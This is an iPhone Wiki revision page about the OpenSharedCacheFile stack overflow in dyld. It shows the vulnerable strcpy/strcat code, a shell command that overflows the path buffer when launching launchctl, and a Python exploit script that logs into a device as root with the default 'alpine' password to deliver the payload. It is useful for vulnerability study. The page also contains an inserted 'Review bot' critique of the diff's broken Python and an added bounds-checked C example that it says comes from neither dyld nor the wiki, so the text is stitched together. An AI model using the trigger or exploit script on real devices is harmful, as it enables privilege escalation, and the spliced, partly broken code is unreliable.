Difference between revisions of "OpenSharedCacheFile"

From The iPhone Wiki
(Exploiting it)
Line 23: Line 23:
 
junk = "A" * 1024
 
junk = "A" * 1024
 
shellcode = ""
 
shellcode = ""
payload = DYLD_SHARED_CACHE_DIR = junk+shellcode \
+
payload = "DYLD_SHARED_CACHE_DIR"
  +
actual = payload+junk+shellcode \
cmd = DYLD_SHARED_REGION = private /bin/launchctl
 
  +
cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"
 
ssh = paramiko.SSHClient()
 
ssh = paramiko.SSHClient()
 
server = "" #whatever IP
 
server = "" #whatever IP
 
ssh.connect(server, username=root, password=alpine)
 
ssh.connect(server, username=root, password=alpine)
ssh.exec_command(payload)
+
ssh.exec_command(actual)
 
ssh.exec_command(cmd)
 
ssh.exec_command(cmd)
 
 
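Review bot: the revised `actual`/`cmd` lines do not parse as Python. `actual = payload+junk+shellcode \` ends in a line-continuation backslash, so the following `cmd = ...` statement is spliced into the same expression, and `cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"` has an odd number of double quotes, so the string literal never terminates; dropping the trailing backslash and writing `cmd = "DYLD_SHARED_REGION=private /bin/launchctl"` fixes both. Changing `payload` to the bare name `"DYLD_SHARED_CACHE_DIR"` also dropped the `=` that the old line had between the variable name and its value, so `payload+junk+shellcode` is no longer an environment assignment, and because each `exec_command` call runs in its own session the assignment sent by the first call is not visible to the second; the unquoted `username=root, password=alpine` in the unchanged context are undefined names rather than strings.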

Revision as of 19:10, 24 March 2015

The OpenSharedCacheFile bug was found by i0n1c. It is a simple stack buffer overflow.

openSharedCacheFile() function

int openSharedCacheFile()
{
  char path[1024];                                      // fixed-size stack buffer
  strcpy(path, sSharedCacheDir);                        // unbounded copy of the DYLD_SHARED_CACHE_DIR value
  strcat(path, "/");
  strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);  // no length check anywhere in the sequence
  return ::open(path, O_RDONLY);
}
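As an added illustration (not code from dyld or from this wiki page), the same path construction with its length checked, plus a helper that shows why a 2000-byte directory value overruns the 1024-byte buffer; the base-name, arch and default-directory strings are assumed values for the example.

```c
#include <stdio.h>
#include <string.h>

/* Sizes and names as in the dyld snippet on the page; the base-name, arch
 * and default-directory strings are assumed values for this example. */
#define PATH_BUF_SIZE 1024
#define DYLD_SHARED_CACHE_BASE_NAME "dyld_shared_cache_"
#define ARCH_NAME "armv7"
#define SHARED_CACHE_DIR_DEFAULT "/System/Library/Caches/com.apple.dyld"

/* Bytes the original strcpy/strcat sequence writes into the 1024-byte
 * `path` buffer for a given directory value, including the final NUL. */
size_t shared_cache_path_len(const char *dir)
{
    return strlen(dir) + 1 /* '/' */
         + strlen(DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME) + 1 /* NUL */;
}

/* 1 if this directory value would overrun the fixed buffer. */
int would_overflow(const char *dir)
{
    return shared_cache_path_len(dir) > PATH_BUF_SIZE;
}

/* Bounded replacement for the path construction: fills `out` and returns
 * 0, or returns -1 with `out` emptied when the result would not fit. */
int build_shared_cache_path(const char *dir, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", dir,
                     DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
    if (n < 0 || (size_t)n >= outlen) {
        if (outlen) out[0] = '\0';
        return -1;  /* would be truncated: refuse instead of opening a bogus path */
    }
    return 0;
}

/* Constructed input: the page's 2000 'A's. Returns 1 if the default dir fits,
 * the 2000-byte dir would overflow the original code, and the builder rejects it. */
int check_page_example(void)
{
    char path[PATH_BUF_SIZE];
    char junk[2001];
    memset(junk, 'A', 2000);
    junk[2000] = '\0';
    return build_shared_cache_path(SHARED_CACHE_DIR_DEFAULT, path, sizeof path) == 0
        && would_overflow(junk) == 1
        && build_shared_cache_path(junk, path, sizeof path) == -1;
}
```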

Triggering the vuln

To trigger it, run the following:

 DYLD_SHARED_CACHE_DIR="$(printf 'A%.0s' $(seq 1 2000))" \
 DYLD_SHARED_REGION=private /bin/launchctl

The 2000-byte value overruns the 1024-byte `path` buffer on the stack and clobbers the saved return address, so the PC register is overwritten when the function returns; that is what makes this a stack overflow.

Exploiting it

Since this bug can take over the PC register, you first need to know where the overflow begins. For now, assume it crashes after 1024 A's; your payload to get root would then be:

 import paramiko

 junk = "A" * 1024            # filler up to the assumed crash offset
 shellcode = ""
 payload = "DYLD_SHARED_CACHE_DIR="
 actual = payload + junk + shellcode
 cmd = "DYLD_SHARED_REGION=private /bin/launchctl"
 ssh = paramiko.SSHClient()
 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 server = ""                  # whatever IP
 ssh.connect(server, username="root", password="alpine")
 # both assignments go on one command line, as in the trigger above:
 # each exec_command() runs in its own shell session
 ssh.exec_command(actual + " " + cmd)
 